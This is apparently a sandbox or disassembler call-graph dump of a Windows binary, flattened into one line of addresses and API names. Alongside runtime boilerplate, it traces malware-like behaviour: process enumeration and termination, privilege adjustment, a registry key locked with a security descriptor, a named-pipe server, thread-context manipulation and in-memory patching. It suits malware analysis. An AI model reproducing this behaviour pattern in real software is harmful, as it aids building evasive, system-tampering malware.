1c0401ccf6d 16238->16239 16253 1c0401cc3e0 16238->16253 16240 1c0401ccf82 16239->16240 16242 1c0401cc3e0 _invalid_parameter_noinfo 17 API calls 16239->16242 16240->16207 16242->16240 16266 1c0401cccc8 16243->16266 16248 1c0401ccfcf 16248->16238 16254 1c0401cc3ef GetLastError 16253->16254 16255 1c0401cc438 16253->16255 16256 1c0401cc404 16254->16256 16255->16239 16257 1c0401ccba0 _invalid_parameter_noinfo 14 API calls 16256->16257 16258 1c0401cc41e SetLastError 16257->16258 16258->16255 16259 1c0401cc441 16258->16259 16260 1c0401cc3e0 _invalid_parameter_noinfo 15 API calls 16259->16260 16261 1c0401cc467 16260->16261 16292 1c0401cffe8 16261->16292 16267 1c0401ccd1f 16266->16267 16268 1c0401ccce4 GetLastError 16266->16268 16267->16248 16272 1c0401ccd34 16267->16272 16269 1c0401cccf4 16268->16269 16279 1c0401ccba0 16269->16279 16273 1c0401ccd68 16272->16273 16274 1c0401ccd50 GetLastError SetLastError 16272->16274 16273->16248 16275 1c0401cd06c IsProcessorFeaturePresent 16273->16275 16274->16273 16276 1c0401cd07f 16275->16276 16284 1c0401ccd80 16276->16284 16280 1c0401ccbc8 FlsGetValue 16279->16280 16281 1c0401ccbc4 16279->16281 16280->16281 16282 1c0401ccbde SetLastError 16281->16282 16283 1c0401cc940 _invalid_parameter_noinfo 13 API calls 16281->16283 16282->16267 16283->16282 16285 1c0401ccdba _invalid_parameter_noinfo 16284->16285 16286 1c0401ccde2 RtlCaptureContext RtlLookupFunctionEntry 16285->16286 16287 1c0401cce2e RtlVirtualUnwind 16286->16287 16288 1c0401cce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16286->16288 16287->16288 16289 1c0401cceb6 _invalid_parameter_noinfo 16288->16289 16290 1c0401c8070 _invalid_parameter_noinfo 8 API calls 16289->16290 16291 1c0401cced5 GetCurrentProcess TerminateProcess 16290->16291 16293 1c0401cc48f 16292->16293 16294 1c0401d0001 16292->16294 16296 1c0401d0054 16293->16296 16294->16293 16295 1c0401d0a40 _invalid_parameter_noinfo 14 API calls 16294->16295 16295->16293 16297 1c0401d006d 16296->16297 16298 1c0401cc49f 16296->16298 16297->16298 16299 1c0401ce8c4 _invalid_parameter_noinfo 14 API calls 16297->16299 16298->16239 16299->16298 16323 1c0401cd1d0 16300->16323 16302 1c0401cd191 Concurrency::details::SchedulerProxy::DeleteThis 16303 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16302->16303 16304 1c0401cd1a1 16303->16304 16304->16222 16306 1c0401cf1a9 16305->16306 16307 1c0401cf1ca 16305->16307 16306->16307 16308 1c0401cef88 9 API calls 16306->16308 16307->16217 16308->16307 16310 1c0401cde5b 16309->16310 16315 1c0401cde40 16309->16315 16311 1c0401cece8 WideCharToMultiByte 16310->16311 16317 1c0401cde60 16310->16317 16312 1c0401cdeb7 16311->16312 16313 1c0401cdebe GetLastError 16312->16313 16312->16317 16318 1c0401cdee9 16312->16318 16316 1c0401cd184 13 API calls 16313->16316 16314 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16314->16315 16315->16222 16319 1c0401cdecb 16316->16319 16317->16314 16317->16315 16320 1c0401cece8 WideCharToMultiByte 16318->16320 16321 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16319->16321 16322 1c0401cdf10 16320->16322 16321->16315 16322->16313 16322->16315 16324 1c0401ccb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16323->16324 16325 1c0401cd1d9 16324->16325 16325->16302 16327 1c0401ceba8 16326->16327 16328 1c0401cdd78 14 API calls 16327->16328 16329 1c0401cebcc 16328->16329 16329->16225 16330 1c0401f81c0 16331 1c0401f81c9 __scrt_release_startup_lock 16330->16331 16332 1c0401f81cd 16331->16332 16334 1c0401fbbb4 16331->16334 16335 1c0401fbbed 16334->16335 16336 1c0401fbbd4 16334->16336 16335->16332 16337 1c0401fbbdc 16336->16337 16338 1c0401fbbf2 16336->16338 16339 1c0401fd1f4 __std_exception_copy 13 API calls 16337->16339 16366 1c0401fe864 16338->16366 16342 1c0401fbbe1 16339->16342 16363 1c0401fd04c 16342->16363 16350 1c0401fbc7a 16353 1c0401fb994 14 API calls 16350->16353 16351 1c0401fbc69 16352 1c0401fd1f4 __std_exception_copy 13 API calls 16351->16352 16362 1c0401fbc6e 16352->16362 16355 1c0401fbc96 16353->16355 16354 1c0401fd2a0 __free_lconv_mon 13 API calls 16354->16335 16356 1c0401fbcdf 16355->16356 16357 1c0401fbcc6 16355->16357 16355->16362 16360 1c0401fd2a0 __free_lconv_mon 13 API calls 16356->16360 16358 1c0401fd2a0 __free_lconv_mon 13 API calls 16357->16358 16359 1c0401fbccf 16358->16359 16361 1c0401fd2a0 __free_lconv_mon 13 API calls 16359->16361 16360->16362 16361->16335 16362->16354 16396 1c0401fcef8 16363->16396 16367 1c0401fe871 16366->16367 16368 1c0401fbbf7 16366->16368 16496 1c0401fcacc 16367->16496 16372 1c0401fdf38 GetModuleFileNameW 16368->16372 16370 1c0401fe8a0 16501 1c0401fe53c 16370->16501 16373 1c0401fdf91 16372->16373 16374 1c0401fdf7d GetLastError 16372->16374 16376 1c0401fdd78 14 API calls 16373->16376 16692 1c0401fd184 16374->16692 16377 1c0401fdfbf 16376->16377 16383 1c0401fdfd0 16377->16383 16697 1c0401ff198 16377->16697 16378 1c0401fdf8a 16379 1c0401f8070 _invalid_parameter_noinfo 8 API calls 16378->16379 16382 1c0401fbc0e 16379->16382 16384 1c0401fb994 16382->16384 16701 1c0401fde1c 16383->16701 16386 1c0401fb9d2 16384->16386 16388 1c0401fba38 16386->16388 16718 1c0401fec1c 16386->16718 16387 1c0401fbb25 16390 1c0401fbb54 16387->16390 16388->16387 16389 1c0401fec1c 14 API calls 16388->16389 16389->16388 16391 1c0401fbb6c 16390->16391 16395 1c0401fbba4 16390->16395 16392 1c0401fd220 __std_exception_copy 13 API calls 16391->16392 16391->16395 16393 1c0401fbb9a 16392->16393 16394 1c0401fd2a0 __free_lconv_mon 13 API calls 16393->16394 16394->16395 16395->16350 16395->16351 16397 1c0401fcf23 16396->16397 16404 1c0401fcf94 16397->16404 16399 1c0401fcf4a 16400 1c0401fcf6d 16399->16400 16414 1c0401fc3e0 16399->16414 16402 1c0401fcf82 16400->16402 16403 1c0401fc3e0 _invalid_parameter_noinfo 17 API calls 16400->16403 16402->16335 16403->16402 16427 1c0401fccc8 16404->16427 16408 1c0401fcfcf 16408->16399 16415 1c0401fc3ef GetLastError 16414->16415 16416 1c0401fc438 16414->16416 16417 1c0401fc404 16415->16417 16416->16400 16418 1c0401fcba0 _invalid_parameter_noinfo 14 API calls 16417->16418 16419 1c0401fc41e SetLastError 16418->16419 16419->16416 16420 1c0401fc441 16419->16420 16421 1c0401fc3e0 _invalid_parameter_noinfo 15 API calls 16420->16421 16422 1c0401fc467 16421->16422 16467 1c0401fffe8 16422->16467 16428 1c0401fcce4 GetLastError 16427->16428 16429 1c0401fcd1f 16427->16429 16430 1c0401fccf4 16428->16430 16429->16408 16433 1c0401fcd34 16429->16433 16440 1c0401fcba0 16430->16440 16434 1c0401fcd50 GetLastError SetLastError 16433->16434 16435 1c0401fcd68 16433->16435 16434->16435 16435->16408 16436 1c0401fd06c IsProcessorFeaturePresent 16435->16436 16437 1c0401fd07f 16436->16437 16445 1c0401fcd80 16437->16445 16441 1c0401fcbc8 FlsGetValue 16440->16441 16443 1c0401fcbc4 16440->16443 16441->16443 16442 1c0401fcbde SetLastError 16442->16429 16443->16442 16444 1c0401fc940 __std_exception_copy 13 API calls 16443->16444 16444->16442 16446 1c0401fcdba _invalid_parameter_noinfo 16445->16446 16447 1c0401fcde2 RtlCaptureContext RtlLookupFunctionEntry 16446->16447 16448 1c0401fce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16447->16448 16449 1c0401fce2e RtlVirtualUnwind 16447->16449 16450 1c0401fceb6 _invalid_parameter_noinfo 16448->16450 16449->16448 16453 1c0401f8070 16450->16453 16454 1c0401f8079 16453->16454 16455 1c0401f8084 GetCurrentProcess TerminateProcess 16454->16455 16456 1c0401f8848 IsProcessorFeaturePresent 16454->16456 16457 1c0401f8860 16456->16457 16462 1c0401f891c RtlCaptureContext 16457->16462 16463 1c0401f8936 RtlLookupFunctionEntry 16462->16463 16464 1c0401f894c RtlVirtualUnwind 16463->16464 16465 1c0401f8873 16463->16465 16464->16463 16464->16465 16466 1c0401f8814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16465->16466 16468 1c040200001 16467->16468 16469 1c0401fc48f 16467->16469 16468->16469 16475 1c040200a40 16468->16475 16471 1c040200054 16469->16471 16472 1c0401fc49f 16471->16472 16473 1c04020006d 16471->16473 16472->16400 16473->16472 16493 1c0401fe8c4 16473->16493 16484 1c0401fcab0 16475->16484 16477 1c040200a4f 16483 1c040200a95 16477->16483 16492 1c0401fc558 EnterCriticalSection 16477->16492 16483->16469 16485 1c0401fcb10 __std_exception_copy 13 API calls 16484->16485 16487 1c0401fcab9 16485->16487 16486 1c0401fcabe 16486->16477 16487->16486 16488 1c0401fcae8 FlsGetValue 16487->16488 16490 1c0401fcae4 16487->16490 16488->16490 16489 1c0401fcafe 16489->16477 16490->16489 16491 1c0401fc940 __std_exception_copy 13 API calls 16490->16491 16491->16489 16494 1c0401fcab0 _invalid_parameter_noinfo 14 API calls 16493->16494 16495 1c0401fe8cd 16494->16495 16497 1c0401fcae4 16496->16497 16498 1c0401fcae8 FlsGetValue 16496->16498 16499 1c0401fcafe 16497->16499 16500 1c0401fc940 __std_exception_copy 13 API calls 16497->16500 16498->16497 16499->16370 16500->16499 16524 1c0401fe7ac 16501->16524 16508 1c0401fe5a7 16509 1c0401fd2a0 __free_lconv_mon 13 API calls 16508->16509 16523 1c0401fe58e 16509->16523 16510 1c0401fe5b6 16510->16510 16550 1c0401fe8e0 16510->16550 16513 1c0401fe6b2 16514 1c0401fd1f4 __std_exception_copy 13 API calls 16513->16514 16516 1c0401fe6b7 16514->16516 16515 1c0401fe6cc 16517 1c0401fe70d 16515->16517 16520 1c0401fd2a0 __free_lconv_mon 13 API calls 16515->16520 16519 1c0401fd2a0 __free_lconv_mon 13 API calls 16516->16519 16518 1c0401fe774 16517->16518 16561 1c0401fe05c 16517->16561 16522 1c0401fd2a0 __free_lconv_mon 13 API calls 16518->16522 16519->16523 16520->16517 16522->16523 16523->16368 16525 1c0401fe7cf 16524->16525 16530 1c0401fe7d9 16525->16530 16576 1c0401fc558 EnterCriticalSection 16525->16576 16532 1c0401fe571 16530->16532 16533 1c0401fcacc 14 API calls 16530->16533 16536 1c0401fe22c 16532->16536 16534 1c0401fe8a0 16533->16534 16535 1c0401fe53c 56 API calls 16534->16535 16535->16532 16577 1c0401fdd78 16536->16577 16538 1c0401fe240 16539 1c0401fe24c GetOEMCP 16538->16539 16540 1c0401fe25e 16538->16540 16542 1c0401fe273 16539->16542 16541 1c0401fe263 GetACP 16540->16541 16540->16542 16541->16542 16542->16523 16543 1c0401fc5d0 16542->16543 16544 1c0401fc61b 16543->16544 16549 1c0401fc5df __std_exception_copy 16543->16549 16546 1c0401fd1f4 __std_exception_copy 13 API calls 16544->16546 16545 1c0401fc602 HeapAlloc 16547 1c0401fc619 16545->16547 16545->16549 16546->16547 16547->16508 16547->16510 16548 1c0401fb470 __std_exception_copy 2 API calls 16548->16549 16549->16544 16549->16545 16549->16548 16551 1c0401fe22c 16 API calls 16550->16551 16552 1c0401fe91b 16551->16552 16553 1c0401fea71 16552->16553 16555 1c0401fe958 IsValidCodePage 16552->16555 16559 1c0401fe972 16552->16559 16554 1c0401f8070 _invalid_parameter_noinfo 8 API calls 16553->16554 16557 1c0401fe6a9 16554->16557 16555->16553 16556 1c0401fe969 16555->16556 16558 1c0401fe998 GetCPInfo 16556->16558 16556->16559 16557->16513 16557->16515 16558->16553 16558->16559 16593 1c0401fe344 16559->16593 16691 1c0401fc558 EnterCriticalSection 16561->16691 16578 1c0401fdd9c 16577->16578 16579 1c0401fdd97 16577->16579 16578->16579 16580 1c0401fcab0 _invalid_parameter_noinfo 14 API calls 16578->16580 16579->16538 16581 1c0401fddb7 16580->16581 16585 1c0401fffb4 16581->16585 16586 1c0401fffc9 16585->16586 16587 1c0401fddda 16585->16587 16586->16587 16588 1c040200a40 _invalid_parameter_noinfo 14 API calls 16586->16588 16589 1c040200020 16587->16589 16588->16587 16590 1c040200035 16589->16590 16591 1c040200048 16589->16591 16590->16591 16592 1c0401fe8c4 _invalid_parameter_noinfo 14 API calls 16590->16592 16591->16579 16592->16591 16594 1c0401fe38f GetCPInfo 16593->16594 16595 1c0401fe485 16593->16595 16594->16595 16600 1c0401fe3a2 16594->16600 16596 1c0401f8070 _invalid_parameter_noinfo 8 API calls 16595->16596 16597 1c0401fe524 16596->16597 16597->16553 16604 1c040201474 16600->16604 16605 1c0401fdd78 14 API calls 16604->16605 16606 1c0402014b6 16605->16606 16624 1c0401fec58 16606->16624 16625 1c0401fec61 MultiByteToWideChar 16624->16625 16715 1c0401fd1d0 16692->16715 16694 1c0401fd191 __free_lconv_mon 16695 1c0401fd1f4 __std_exception_copy 13 API calls 16694->16695 16696 1c0401fd1a1 16695->16696 16696->16378 16698 1c0401ff1ca 16697->16698 16699 1c0401ff1a9 16697->16699 16698->16383 16699->16698 16700 1c0401fef88 9 API calls 16699->16700 16700->16698 16702 1c0401fde5b 16701->16702 16704 1c0401fde40 16701->16704 16703 1c0401fde60 16702->16703 16705 1c0401fece8 WideCharToMultiByte 16702->16705 16703->16704 16708 1c0401fd1f4 __std_exception_copy 13 API calls 16703->16708 16704->16378 16706 1c0401fdeb7 16705->16706 16706->16703 16707 1c0401fdebe GetLastError 16706->16707 16710 1c0401fdee9 16706->16710 16709 1c0401fd184 13 API calls 16707->16709 16708->16704 16711 1c0401fdecb 16709->16711 16712 1c0401fece8 WideCharToMultiByte 16710->16712 16713 1c0401fd1f4 __std_exception_copy 13 API calls 16711->16713 16714 1c0401fdf10 16712->16714 16713->16704 16714->16704 16714->16707 16716 1c0401fcb10 __std_exception_copy 13 API calls 16715->16716 16717 1c0401fd1d9 16716->16717 16717->16694 16719 1c0401feba8 16718->16719 16720 1c0401fdd78 14 API calls 16719->16720 16721 1c0401febcc 16720->16721 16721->16386 18499 1c0401d47c2 18500 1c0401c9978 __CxxCallCatchBlock 9 API calls 18499->18500 18504 1c0401d47d5 18500->18504 18501 1c0401d4814 __CxxCallCatchBlock 18502 1c0401c9324 __CxxCallCatchBlock 9 API calls 18501->18502 18503 1c0401d4828 18502->18503 18505 1c0401c9324 __CxxCallCatchBlock 9 API calls 18503->18505 18504->18501 18507 1c0401c8ff8 __CxxCallCatchBlock 9 API calls 18504->18507 18506 1c0401d4838 18505->18506 18507->18501 18508 1c0401ccbfc 18513 1c0401cf3a0 18508->18513 18510 1c0401ccc05 18511 1c0401ccc22 __vcrt_uninitialize_ptd 18510->18511 18512 1c0401ccb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18510->18512 18512->18511 18514 1c0401cf3b5 18513->18514 18515 1c0401cf3b1 18513->18515 18514->18515 18516 1c0401cef88 9 API calls 18514->18516 18515->18510 18516->18515 16722 1c0401c41f9 16725 1c0401c4146 16722->16725 16723 1c0401c41b0 16724 1c0401c4196 VirtualQuery 16724->16723 16724->16725 16725->16723 16725->16724 16726 1c0401c41ca VirtualAlloc 16725->16726 16726->16723 16727 1c0401c41fb GetLastError 16726->16727 16727->16725 18526 1c0401c5ff9 18527 1c0401c6000 VirtualProtect 18526->18527 18528 1c0401c6029 GetLastError 18527->18528 18529 1c0401c5f10 18527->18529 18528->18529 17952 1c0401d46f5 17953 1c0401c9324 __CxxCallCatchBlock 9 API calls 17952->17953 17954 1c0401d470d 17953->17954 17955 1c0401c9324 __CxxCallCatchBlock 9 API calls 17954->17955 17956 1c0401d4728 17955->17956 17957 1c0401c9324 __CxxCallCatchBlock 9 API calls 17956->17957 17958 1c0401d473c 17957->17958 17959 1c0401c9324 __CxxCallCatchBlock 9 API calls 17958->17959 17960 1c0401d477e 17959->17960 18534 1c0401c2ff0 18535 1c0401c3061 18534->18535 18536 1c0401c3384 18535->18536 18537 1c0401c308d GetModuleHandleA 18535->18537 18538 1c0401c309f GetProcAddress 18537->18538 18539 1c0401c30b1 18537->18539 18538->18539 18539->18536 18540 1c0401c30d8 StrCmpNIW 18539->18540 18540->18536 18541 1c0401c30fd 18540->18541 18541->18536 18542 1c0401c1a30 6 API calls 18541->18542 18543 1c0401c320f lstrlenW 18541->18543 18544 1c0401c32b9 lstrlenW 18541->18544 18545 1c0401c3f88 StrCmpNIW 18541->18545 18546 1c0401c1cfc StrCmpIW StrCmpW 18541->18546 18542->18541 18543->18541 18544->18541 18545->18541 18546->18541 16734 1c0402019d0 16735 1c0401fe864 56 API calls 16734->16735 16736 1c0402019d9 16735->16736 18560 1c0401c27e8 18562 1c0401c2867 18560->18562 18561 1c0401c2998 18562->18561 18563 1c0401c28c9 GetFileType 18562->18563 18564 1c0401c28ed 18563->18564 18565 1c0401c28d7 StrCpyW 18563->18565 18567 1c0401c1ad4 4 API calls 18564->18567 18566 1c0401c28fc 18565->18566 18570 1c0401c299d 18566->18570 18574 1c0401c2906 18566->18574 18567->18566 18568 1c0401c3f88 StrCmpNIW 18568->18570 18569 1c0401c3f88 StrCmpNIW 18569->18574 18570->18561 18570->18568 18571 1c0401c3708 4 API calls 18570->18571 18572 1c0401c1dd4 2 API calls 18570->18572 18571->18570 18572->18570 18573 1c0401c3708 4 API calls 18573->18574 18574->18561 18574->18569 18574->18573 18575 1c0401c1dd4 2 API calls 18574->18575 18575->18574 18606 1c0401cb7ea 18607 1c0401cc2f4 14 API calls 18606->18607 18608 1c0401cb7ef 18607->18608 18609 1c0401cb85f 18608->18609 18610 1c0401cb815 GetModuleHandleW 18608->18610 18623 1c0401cb6f8 18609->18623 18610->18609 18614 1c0401cb822 18610->18614 18614->18609 18618 1c0401cb904 GetModuleHandleExW 18614->18618 18619 1c0401cb938 GetProcAddress 18618->18619 18622 1c0401cb94a 18618->18622 18619->18622 18620 1c0401cb95b FreeLibrary 18621 1c0401cb962 18620->18621 18621->18609 18622->18620 18622->18621 18635 1c0401cc558 EnterCriticalSection 18623->18635 18652 1c0401cf3e4 18653 1c0401cf41d 18652->18653 18654 1c0401cf3ee 18652->18654 18654->18653 18655 1c0401cf403 FreeLibrary 18654->18655 18655->18654 18656 1c0401d33e4 18657 1c0401d33fb 18656->18657 18658 1c0401d33f5 CloseHandle 18656->18658 18658->18657 17971 1c0401d06e0 17972 1c0401d06f9 17971->17972 17973 1c0401d06e9 17971->17973 17974 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17973->17974 17975 1c0401d06ee 17974->17975 17976 1c0401cd04c _invalid_parameter_noinfo 38 API calls 17975->17976 17976->17972 18685 1c0401c63e3 18686 1c0401c63f0 18685->18686 18687 1c0401c63fc GetThreadContext 18686->18687 18693 1c0401c655a 18686->18693 18688 1c0401c6422 18687->18688 18687->18693 18692 1c0401c6449 18688->18692 18688->18693 18689 1c0401c6581 VirtualProtect FlushInstructionCache 18689->18693 18690 1c0401c665e 18707 1c0401c5530 GetCurrentProcess 18690->18707 18691 1c0401c663e 18691->18690 18703 1c0401c4b20 18691->18703 18695 1c0401c64cd 18692->18695 18697 1c0401c64a6 SetThreadContext 18692->18697 18693->18689 18693->18691 18697->18695 18698 1c0401c66b7 18701 1c0401c8070 _invalid_parameter_noinfo 8 API calls 18698->18701 18699 1c0401c6677 ResumeThread 18700 1c0401c6663 18699->18700 18700->18698 18700->18699 18702 1c0401c66ff 18701->18702 18705 1c0401c4b3c 18703->18705 18704 1c0401c4b9f 18704->18690 18705->18704 18706 1c0401c4b52 VirtualFree 18705->18706 18706->18705 18708 1c0401c554c 18707->18708 18709 1c0401c5562 VirtualProtect FlushInstructionCache 18708->18709 18710 1c0401c5593 18708->18710 18709->18708 18710->18700 16749 1c0401cc218 16750 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16749->16750 16751 1c0401cc228 16750->16751 16752 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16751->16752 16753 1c0401cc23c 16752->16753 16754 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16753->16754 16755 1c0401cc250 16754->16755 16756 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16755->16756 16757 1c0401cc264 16756->16757 19053 1c0401c2518 GetProcessIdOfThread GetCurrentProcessId 19054 1c0401c25be 19053->19054 19055 1c0401c2543 CreateFileW 19053->19055 19055->19054 19056 1c0401c2577 WriteFile ReadFile CloseHandle 19055->19056 19056->19054 15563 140003728 15564 140003735 15563->15564 15566 140003755 ConnectNamedPipe 15564->15566 15567 14000374a Sleep 15564->15567 15574 140002300 AllocateAndInitializeSid 15564->15574 15568 1400037b3 Sleep 15566->15568 15569 140003764 ReadFile 15566->15569 15567->15564 15570 1400037be DisconnectNamedPipe 15568->15570 15569->15570 15571 140003787 15569->15571 15570->15566 15573 1400031c4 31 API calls 15571->15573 15572 14000378d WriteFile 15572->15570 15573->15572 15575 14000241b 15574->15575 15576 14000235d SetEntriesInAclW 15574->15576 15575->15564 15576->15575 15577 1400023a1 LocalAlloc 15576->15577 15577->15575 15578 1400023b5 InitializeSecurityDescriptor 15577->15578 15578->15575 15579 1400023c5 SetSecurityDescriptorDacl 15578->15579 15579->15575 15580 1400023dc CreateNamedPipeW 15579->15580 15580->15575 16767 1c0401d4611 __scrt_dllmain_exception_filter 19061 1c0401cc510 19062 1c0401cc518 19061->19062 19063 1c0401cc545 19062->19063 19065 1c0401cc574 19062->19065 19066 1c0401cc59f 19065->19066 19067 1c0401cc582 DeleteCriticalSection 19066->19067 19068 1c0401cc5a3 19066->19068 19067->19066 19068->19063 16768 1c0401c820c 16775 1c0401c8f34 16768->16775 16773 1c0401c8219 16784 1c0401c9340 16775->16784 16778 1c0401cc288 16779 1c0401ccb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16778->16779 16780 1c0401c8222 16779->16780 16780->16773 16781 1c0401c8f48 16780->16781 16809 1c0401c92dc 16781->16809 16783 1c0401c8f51 16783->16773 16785 1c0401c935f GetLastError 16784->16785 16786 1c0401c8215 16784->16786 16796 1c0401c9c8c 16785->16796 16786->16773 16786->16778 16800 1c0401c9aac 16796->16800 16801 1c0401c9b96 TlsGetValue 16800->16801 16807 1c0401c9af0 __vcrt_FlsAlloc 16800->16807 16802 1c0401c9b1e LoadLibraryExW 16804 1c0401c9bbd 16802->16804 16805 1c0401c9b3f GetLastError 16802->16805 16803 1c0401c9bdd GetProcAddress 16803->16801 16804->16803 16806 1c0401c9bd4 FreeLibrary 16804->16806 16805->16807 16806->16803 16807->16801 16807->16802 16807->16803 16808 1c0401c9b61 LoadLibraryExW 16807->16808 16808->16804 16808->16807 16810 1c0401c92ed 16809->16810 16814 1c0401c9302 16809->16814 16811 1c0401c9c8c __CxxCallCatchBlock 6 API calls 16810->16811 16812 1c0401c92f2 16811->16812 16815 1c0401c9cd4 16812->16815 16814->16783 16816 1c0401c9aac __vcrt_FlsAlloc 5 API calls 16815->16816 16817 1c0401c9d02 16816->16817 16818 1c0401c9d0c 16817->16818 16819 1c0401c9d14 TlsSetValue 16817->16819 16818->16814 16819->16818 17977 1c0401c8f0c 17984 1c0401c946c 17977->17984 17980 1c0401c8f19 17986 1c0401c9474 17984->17986 17987 1c0401c94a5 17986->17987 17988 1c0401c8f15 17986->17988 18001 1c0401c9d28 17986->18001 17989 1c0401c94b4 __vcrt_uninitialize_locks DeleteCriticalSection 17987->17989 17988->17980 17990 1c0401c9400 17988->17990 17989->17988 18006 1c0401c9bfc 17990->18006 18002 1c0401c9aac __vcrt_FlsAlloc 5 API calls 18001->18002 18003 1c0401c9d5e 18002->18003 18004 1c0401c9d68 18003->18004 18005 1c0401c9d73 InitializeCriticalSectionAndSpinCount 18003->18005 18004->17986 18005->18004 18007 1c0401c9aac __vcrt_FlsAlloc 5 API calls 18006->18007 18008 1c0401c9c21 TlsAlloc 18007->18008 15426 140002d38 15429 140002d4c 15426->15429 15430 140002d5e OpenMutexW 15429->15430 15431 140002d84 CloseHandle 15430->15431 15432 140002d77 Sleep 15430->15432 15477 140002a0c 15431->15477 15432->15430 15435 140002a0c 14 API calls 15436 140002da5 GetCurrentProcessId OpenProcess 15435->15436 15437 140002dc3 OpenProcessToken 15436->15437 15438 140002e39 RegOpenKeyExW 15436->15438 15441 140002dd9 LookupPrivilegeValueW 15437->15441 15442 140002e30 CloseHandle 15437->15442 15439 140002d41 ExitProcess 15438->15439 15440 140002e6a RegQueryValueExW 15438->15440 15440->15439 15444 140002e9a RegQueryValueExW 15440->15444 15441->15442 15443 140002df0 AdjustTokenPrivileges 15441->15443 15442->15438 15443->15442 15445 140002e2a GetLastError 15443->15445 15444->15439 15446 140002eca GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 15444->15446 15445->15442 15446->15439 15447 140002f3c RegQueryValueExW 15446->15447 15447->15439 15448 140002f6c RegCloseKey GetCurrentProcessId 15447->15448 15491 14000200c GetProcessHeap HeapAlloc 15448->15491 15450 140002f83 RegCreateKeyExW 15451 14000307d CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 15450->15451 15452 140002fc0 ConvertStringSecurityDescriptorToSecurityDescriptorW 15450->15452 15453 14000151c 50 API calls 15451->15453 15454 140003002 RegCreateKeyExW 15452->15454 15455 140002fe8 RegSetKeySecurity LocalFree 15452->15455 15456 140003107 15453->15456 15457 140003073 RegCloseKey 15454->15457 15458 14000303c GetCurrentProcessId RegSetValueExW RegCloseKey 15454->15458 15455->15454 15459 140003113 ShellExecuteW 15456->15459 15460 140003145 15456->15460 15457->15451 15458->15457 15459->15459 15459->15460 15461 14000148c 6 API calls 15460->15461 15462 14000314d 15461->15462 15463 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15462->15463 15464 140003156 15463->15464 15465 14000148c 6 API calls 15464->15465 15466 14000315f 15465->15466 15467 14000148c 6 API calls 15466->15467 15468 140003168 15467->15468 15469 14000148c 6 API calls 15468->15469 15470 140003171 15469->15470 15471 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15470->15471 15472 14000317a 15471->15472 15473 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15472->15473 15474 140003183 15473->15474 15475 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15474->15475 15476 14000318c GetProcessHeap HeapFree SleepEx 15475->15476 15476->15439 15478 140002a15 StrCpyW StrCatW GetModuleHandleW 15477->15478 15479 140002bdf 15477->15479 15478->15479 15480 140002a66 GetCurrentProcess K32GetModuleInformation 15478->15480 15479->15435 15481 140002bd6 FreeLibrary 15480->15481 15482 140002a96 CreateFileW 15480->15482 15481->15479 15482->15481 15483 140002acb CreateFileMappingW 15482->15483 15484 140002af4 MapViewOfFile 15483->15484 15485 140002bcd CloseHandle 15483->15485 15486 140002bc4 CloseHandle 15484->15486 15487 140002b17 15484->15487 15485->15481 15486->15485 15487->15486 15488 140002b30 lstrcmpiA 15487->15488 15490 140002b6e 15487->15490 15488->15487 15489 140002b70 VirtualProtect VirtualProtect 15488->15489 15489->15486 15490->15486 15497 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 15491->15497 15493 1400020a5 GetProcessHeap HeapFree 15494 140002050 15494->15493 15495 140002071 OpenProcess 15494->15495 15495->15494 15496 140002087 TerminateProcess CloseHandle 15495->15496 15496->15494 15498 140001e58 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 15497->15498 15499 140001d7d 15497->15499 15498->15494 15499->15498 15500 140001d92 OpenProcess 15499->15500 15502 140001e43 CloseHandle 15499->15502 15503 140001de9 ReadProcessMemory 15499->15503 15500->15499 15501 140001daf K32EnumProcessModulesEx 15500->15501 15501->15499 15501->15502 15502->15499 15504 140001e0b 15503->15504 15504->15499 15504->15502 15504->15503 18043 1c0401c2300 18044 1c0401c2331 18043->18044 18045 1c0401c2447 18044->18045 18051 1c0401c2412 18044->18051 18053 1c0401c2355 18044->18053 18046 1c0401c244c 18045->18046 18047 1c0401c24bb 18045->18047 18060 1c0401c35c8 GetProcessHeap HeapAlloc 18046->18060 18050 1c0401c35c8 11 API calls 18047->18050 18047->18051 18049 1c0401c238d StrCmpNIW 18049->18053 18050->18051 18053->18049 18053->18051 18054 1c0401c1d30 18053->18054 18055 1c0401c1db4 18054->18055 18056 1c0401c1d57 GetProcessHeap HeapAlloc 18054->18056 18055->18053 18056->18055 18057 1c0401c1d92 18056->18057 18066 1c0401c1cfc 18057->18066 18064 1c0401c361b 18060->18064 18061 1c0401c36d9 GetProcessHeap HeapFree 18061->18051 18062 1c0401c36d4 18062->18061 18063 1c0401c3666 StrCmpNIW 18063->18064 18064->18061 18064->18062 18064->18063 18065 1c0401c1d30 6 API calls 18064->18065 18065->18064 18067 1c0401c1d1c GetProcessHeap HeapFree 18066->18067 18068 1c0401c1d13 18066->18068 18067->18055 18069 1c0401c1530 2 API calls 18068->18069 18069->18067 19077 1c0401cb500 19082 1c0401cc558 EnterCriticalSection 19077->19082 16872 1c0401c1e3c LoadLibraryA GetProcAddress 16873 1c0401c1e6f 16872->16873 16874 1c0401c1e62 Sleep 16872->16874 16874->16874 19089 1c0401cbd34 19090 1c0401cbd4d 19089->19090 19091 1c0401cbd49 19089->19091 19092 1c0401ce864 56 API calls 